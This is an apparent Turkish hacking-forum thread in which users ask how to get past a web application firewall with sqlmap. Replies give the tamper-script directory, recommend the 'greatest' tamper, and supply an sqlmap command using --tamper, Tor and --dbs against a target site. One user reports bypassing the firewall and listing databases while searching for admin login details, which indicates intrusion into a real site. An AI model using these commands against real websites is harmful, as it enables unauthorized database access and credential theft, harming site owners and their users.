Basliktan da okudugunuz gibi sqlmap de WAF nasil atlatilir?
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
Yorumunuz icin tesekkür ederim ilk denemem de basarisiz oldum yarin tekrar deneyecegim.benimde aklımda olan bir konuydu.
en ufak bir sql sorgusu girdiğimde blocklanıyor.
şu konu belki işini görür.
![]()
SQLmap'i WAF Bypass (Tamper) Scriptleri ile Kullanma
Bilgi Güvenliği Uzmanı, Siber Güvenlik Uzmanıwww.ismailsaygili.com.tr
cd /usr/share/sqlmap/tamper/
ls
"greatest"
sqlmap -u [sitenin sql açığı]
--tamper=[bypass dosyanız] -tor --dbs
Merhabalar cevabiniz icin tesekkür ederim sayenizde WAF atlattim ve dbs girdim ama admin giris bilgilerini bulamadim dbs de.Merhaba değerli üye ;
Aşağıdaki adımları uygularırsa Waf geçmiş olursunuz
1-)Bypass Bulma
Kod:cd /usr/share/sqlmap/tamper/ ls
yukardaki kod ile bize bypass dosyalarını bize gösterdi.
En iyi baypass kodu ;
Kod:"greatest"
2-)Bypass uygulama
Kod:sqlmap -u [sitenin sql açığı]Kod:--tamper=[bypass dosyanız] -tor --dbs